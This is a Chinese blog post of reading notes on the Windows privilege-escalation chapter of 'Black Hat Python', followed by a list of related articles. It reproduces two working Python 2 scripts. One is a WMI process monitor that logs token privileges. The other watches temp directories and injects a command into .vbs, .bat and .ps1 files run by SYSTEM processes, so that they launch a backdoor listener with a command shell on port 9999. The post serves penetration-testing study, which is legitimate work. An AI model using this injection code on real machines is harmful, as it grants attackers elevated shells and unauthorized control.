《Python黑帽子:黑客与渗透测试编程之道》读书笔记(八):Windows提权

最新推荐文章于 2022-10-29 09:27:54 发布
最新推荐文章于 2022-10-29 09:27:54 发布
阅读量474 收藏 2
点赞数 1
分类专栏: cyber security 读书笔记 Python 文章标签: 安全 web 提权 python windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44604541/article/details/117734329
版权
cyber security 同时被 3 个专栏收录
139 篇文章 174 订阅
订阅专栏
读书笔记
71 篇文章 57 订阅
订阅专栏
Python
22 篇文章 18 订阅
订阅专栏

目录

前言

《Python黑帽子:黑客与渗透测试编程之道》的读书笔记,会包括书中源码,并自己将其中一些改写成Python3版本。书是比较老了,anyway,还是本很好的书

本篇是第10章Windows提权,主要是做一个进程监视器,然后拦截高权限进程并插入脚本

1、进程监视器

利用WMI的API可以监控系统事件

Windows的一些令牌权限

  • SeBackupPrivilege:使得用户进程可以备份文件和目录,读取任何文件而无需关注访问控制列表(ACL)
  • SeDebugPrivilege:使得用户进程可以调试其他进程
  • SeLoadDriver:使得用户进程可以加载或卸载驱动
#!usr/bin/env python
#-*- coding:utf8 -*-  

import win32con
import win32api
import win32security

import wmi
import sys
import os

def get_process_privileges(pid):
    try:
        # 通过pid获取目标进程句柄
        hproc = win32api.OpenProcess(win32con.PROCESS_QUERY_INFORMATION, False, pid)

        # 打开主进程的令牌
        htok = win32security.OpenProcessToken(hproc, win32con.TOKEN_QUERY)

        # 解析已启用的权限列表,获得令牌信息
        privs = win32security.GetTokenInformation(htok, win32security.TokenPrivileges)

        # 迭代每个权限并输出其中已经启用的
        # i[0]:具体权限
        # i[1]:该权限是否启用
        priv_list = ""
        for i in privs:
            # 检测权限是否已经启用
            if i[1] == 3:
                # 获取并连接权限的名称
                priv_list += "%s|" % win32security.LookupPrivilegeName(None, i[0])
    except:
        priv_list = "N/A"

    return priv_list


# 保存数据到文件中
def log_to_file(message):
    fd = open("process_monitor_log.csv", "ab")
    fd.write("%s\r\n" % message)
    fd.close()
    return

# 创建一个日志文件的头
log_to_file("Time,User,Executable,CommandLine,PID,Parent PID,Privileges")

# 初始化WMI接口
c = wmi.WMI()

# 创建进程监控器(监控进程创建)
process_watcher = c.Win32_Process.watch_for("creation")

while True:
    try:
        # 有创建进程事件会返回
        new_process = process_watcher()

        proc_owner = new_process.GetOwner()
        # for i in proc_owner:
        #     print i
        proc_owner = "%s\\%s" % (proc_owner[0], proc_owner[2])
        # 时间
        create_data = new_process.CreationDate
        # 路径
        executable = new_process.ExecutablePath
        # 命令行(就是实际的命令是什么)
        cmdline = new_process.CommandLine
        pid = new_process.ProcessId
        parent_pid = new_process.ParentProcessId

        # N/A:不可用的意思
        # privileges = "N/A"
        privileges = get_process_privileges(pid)

        process_log_message = "%s,%s,%s,%s,%s,%s,%s\r\n" % (create_data, proc_owner, executable, cmdline, pid, parent_pid, privileges)

        print process_log_message

        log_to_file(process_log_message)

    except:
        pass

2、赢得竞争

运行上面的监视器,可能看到类似下面这种记录

在这里插入图片描述
cscript.exe以SYSTEM权限运行

为了能利用权限,必须在和目标程序执行脚本的竞争中占先

#!usr/bin/env python
#-*- coding:utf8 -*-  

import tempfile
import threading
import win32file
import win32con
import os

# 这些是典型的临时文件所在路径,就是我们监控的目录
dirs_to_monitor = ["C:\\WINDOWS\\Temp",tempfile.gettempdir()]

# 文件修改行为对应常量
FILE_CREATE = 1
FILE_DELETE = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5

# 定义匹配特定文件扩展名的字典
file_types = {}

command = "python C:\\WINDOWS\\TEMP\\bhpnet.py –l –p 9999 –c"
# 每段扩展名对应一个特定的标签及我们想要插入的一段脚本
file_types['.vbs'] = ["\r\n'bhpmarker\r\n","\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % command]
file_types['.bat'] = ["\r\nREM bhpmarker\r\n","\r\n%s\r\n" % command]
file_types['.ps1'] = ["\r\n#bhpmarker","Start-Process \"%s\"" % command]

# 用于执行代码插入的函数
def inject_code(full_filename, extension, contents):
    # 判断文件是否存在标记
    if file_types[extension][0] in contents:
        return

    # 如果没有标记的话,那么插入代码并标记
    full_contents = file_types[extension][0]
    full_contents += file_types[extension][1]
    full_contents += contents

    fd = open(full_filename, "wb")
    fd.write(full_contents)
    fd.close()

    print "[\o/] Injected code"

    return

# 为每个监控器起一个线程
def start_monitor(path_to_watch):

    # 访问模式
    FILE_LIST_DIRECTORY = 0x0001

    # 获取文件目录句柄
    h_directory = win32file.CreateFile(
        path_to_watch,
        FILE_LIST_DIRECTORY,
        win32con.FILE_SHARE_READ |win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
        None,
        win32con.OPEN_EXISTING,
        win32con.FILE_FLAG_BACKUP_SEMANTICS,
        None
    )

    while 1:
        try:
            # 这函数会在目录结构改变时通知我们
            results = win32file.ReadDirectoryChangesW(
                h_directory,
                1024,
                True,
                win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
                win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
                win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
                win32con.FILE_NOTIFY_CHANGE_SIZE |
                win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
                win32con.FILE_NOTIFY_CHANGE_SECURITY,
                None,
                None
            )

            # 我们可以获得发送了何种改变,以及目标文件的名称
            for action,file_name in results:
                full_filename = os.path.join(path_to_watch, file_name)

                if action == FILE_CREATE:
                    print "[ + ] Created %s" % full_filename
                elif action == FILE_DELETE:
                    print "[ - ] Deleted %s" % full_filename
                elif action == FILE_MODIFIED:
                    print "[ * ] Modified %s" % full_filename
                    # 输出文件内容
                    print "[vvv] Dumping contents..."
                    try:
                        # 打开文件读数据
                        fd = open(full_filename, "rb")
                        contents = fd.read()
                        fd.close()
                        print contents
                        print "[^^^] Dump complete."
                    except:
                        print "[!!!] Failed."

                    # 文件和文件扩展名分离
                    filename, extension = os.path.splitext(full_filename)
                    if extension in file_types:
                        inject_code(full_filename, extension, contents)

                # 重命名哪个文件
                elif action == FILE_RENAMED_FROM:
                    print "[ > ] Renamed from: %s" % full_filename
                # 重命名后的文件名是?
                elif action == FILE_RENAMED_TO:
                    print "[ < ] Renamed to: %s" % full_filename
                else:
                    print "[???] Unknown: %s" % full_filename
        except:
            pass


for path in dirs_to_monitor:
    monitor_thread = threading.Thread(target=start_monitor,args=(path,))
    print "Spawning monitoring thread for path: %s" % path
    monitor_thread.start()

结语

主要是监视进程,拦截并竞争

思源湖的鱼
关注
专栏目录
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
Python 帽子》学习笔记 - 原书 netcat 代码分析 - Day 7
信安工匠
03-27 3438
简单介绍了 netcat 的功能和运用后,开始学习理解该书中实现的 netcat 代码。 功能 从标准输入中读取数据,并通过网络发送数据。 上传文件。 执行命令。 命令行 shell. 实现 解析命令行选项和参数,根据选项设置相应功能标识及参数变量,如果选项和参数不正确打印帮助信息。 依据功能标识变量,设计调用功能函数的逻辑流程。主体包括两部分,向外连接和本地监听。 向外连接...
Python帽子黑客渗透测试编程之道Windows系统提权
weixin_30763397的博客
05-28 207
环境准备: pywin32的安装在第章的键盘记录中有,这里还需要安装wmi: 在本人的32位win7上本来是没有easy_install这个命令的,这需要安装setuptools-0.6c11.win32-py2.7.exe即可 http://www.sobaidupan.com/file-3739339.html 接着下载安装bhpservice.zip:https://www.n...
python 权限_python 如何获取windows 管理员权限?
weixin_42513870的博客
02-03 1183
测试过在win10 下可以实现。看不懂,但是能用。from __future__ import print_functionimport ctypes, sys, osdef is_admin():try:return ctypes.windll.shell32.IsUserAnAdmin()except:return Falseif is_admin():# 此处添加需要获得管理员权限的os 语...
Python 帽子》学习笔记 - proxy - Day 10
信安工匠
03-30 548
作者提到,proxy 可以将数据从一个主机转发给另一个主机,而且可以评估基于网络的软件。作者常常在实际案例中部署简单的 TCP 代理以了解未知的协议,修改发送到应用的数据包,或者为模糊测试创建一个测试环境。 渗透测试的高手,常常用简单的工具来验证奇思妙想。希望自己也能成为高手。 功能 监听本地端口,接收客户端连接,将客户端的网络数据转发到远程主机,并将远程主机的反馈数据转发到客户端。在转...
Python 实现Windows系统提权
CSDN
05-28 5708
WMI(Windows Management Instrumentation)是Windows操作系统中的管理框架,它提供了一种标准化的方式来管理和监控计算机系统的各种资源和服务。WMI可以通过编程接口(如COM接口)进行访问,并允许开发人员和系统管理员对计算机系统进行远程管理和监控。
关于《Python帽子黑客渗透测试编程之道》的学习笔记
Mi1k7ea
05-04 2万+
本篇文章是学习《Python帽子黑客渗透测试编程之道》的笔记,会持续地将书上的代码自己敲一遍,从而让自己对Python安全编程有更多的了解,同时希望各位可以给给建议,不足之处太多了。 第一章——设置Python环境: Kali Linux的安装就不说了,最近有更新为2017版的可以下载。 确认是否安装了正确的Python版本: 确认是2.7版本的即可。 接着安装P
Python 帽子》学习笔记 - netcat 介绍1- Day 5
信安工匠
03-24 849
netcat 被称为网络瑞士军刀,是一个功能强大设计优雅的网络工具。 netcat 介绍 netcat 是什么,引用 wiki 的说明如下: Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections usi...
Python 帽子》学习笔记 - 准备 - Day 1
信安工匠
03-19 777
信息安全是一个有意思的方向,也是自己的爱好,从零开始,想在工作之余把这个爱好培养为自己的技术能力,而 web 安全相对来说容易入门些,于是选择 web 渗透测试作为学习的起点,并选择同样是容易入门的 Python 作为编程工具,潜心学习,持续学习,做一个 Pythonic 的信安工匠。 借 “Python之禅读书群” 发起的读书活动,选了《Python 帽子 黑客渗透测试编程之道》开始学习和...
读书笔记
闵行小鱼塘
11-02 769
这是一些读书笔记Python帽子黑客渗透测试编程之道、改善python程序的91个建议、 CTF特训营、 程序是怎样跑起来的、 深入理解计算机系统、计算机网络自顶向下方法
Python帽子》学习笔记
weixin_33811539的博客
06-12 612
本篇文章是学习《Python帽子黑客渗透测试编程之道》的笔记,同时希望各位可以给给建议,不足之处太多了。 参考博客: LyShark的渗透测试博客: https://www.cnblogs.com/LyShark/category/1339134.html 前六章代码: https://blog.csdn.net/Kevinhanser/article/details/80140427 Mi...
Python帽子黑客渗透测试编程之道读书笔记(二):原始套接字和流量嗅探
闵行小鱼塘
06-07 862
Python帽子黑客渗透测试编程之道》的读书笔记,会包括书中源码,并自己将其中一些改写成Python3版本。书是比较老了,anyway,还是本很好的书。本篇是第3章原始套接字和流量嗅探
Python 获取Windows管理员权限
热门推荐
Memory
10-18 3万+
最近在写一个可以自动更换 hosts 的 python 脚本,但是操作 hosts 需要管理员权限 ,所以就想着要怎么获取。 总结了一下,有三种方法可以获取,下面分别介绍一下。 1. 以管理员运行 cmd 这个方法很简单,也无需多说,右键以管理员运行就可以了,然后在里面运行 python 脚本就有管理员权限了。 2. 用 cmd 脚本获取 假设我要运行的文件是 test.py,则我可以写一个 cm...
Python帽子黑客渗透测试编程之道读书笔记(三):scapy——网络的掌控者
闵行小鱼塘
06-07 588
Python帽子黑客渗透测试编程之道》的读书笔记,会包括书中源码,并自己将其中一些改写成Python3版本。书是比较老了,anyway,还是本很好的书。本篇是第4章scapy:网络的掌控者,包括简单的窃取email信息,ARP缓存投毒实现,处理PCAP文件里的图像,注意scapy在linux下比较好
python帽子学习笔记(五)—— Scapy
qq_40909772的博客
10-24 770
一、窃取Email认证。 1.sniff函数。 sniff(filter=&quot;&quot;,iface=&quot;any&quot;,prn=function,count) filter参数允许我们对Scapy嗅探的数据包指定一个BPF的过滤器,也可以留空以嗅探所有的数据包。prn参数指定嗅探到符合过滤器条件的数据包时调用的回调函数,这个函数以接收到的数据包对象作为唯一参数。count指定你嗅探的数据包个数;如果留空,Sca...
读书笔记 -《Python 帽子》 ( 一 )
指甲的专栏
02-18 1万+
读书笔记系列文章一直都在读书,读了忘,忘了再读。不如把每次学到的东西都写下来 python帽子 black hat python 黑客渗透测试
python第二版(Black Hat Python 2nd Edition)读书笔记 之 第十章 Windows提权(2)Windows令牌权限
最新发布
阿尔泰野狼的博客
10-29 835
本文记录了博主在阅读Black Hat Python 2nd Edition过程中的心得与踩坑经历。
Python帽子学习笔记-----第三章
hugo2052的博客
10-18 2201
在本章中,我们将使用原始套接字来询问诸如IP和ICMP头等底层的网络信息。在我们的例子中,我们只对IP层和更高层感兴趣,因此我们不会去解码以太网头中的信息。
Windows提权
初学者L_言的博客
06-04 593
一、环境 靶机:Windows系统 (文章里用的:Win2003) 攻击机:python2环境 (文章里用的:Centos7) 二、准备 2.1 前提 已经获得了目标服务器的普通权限!!! e.g. 通过一句话木马。 2.2 工具准备 1、在攻击机上安装:python2环境 下载 xlrd 包: pip install xlrd 2、下载 Windows-Exploit: https://github.com/AonCyberLabs/Windows-Exploit-Suggester 三、提权 1
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值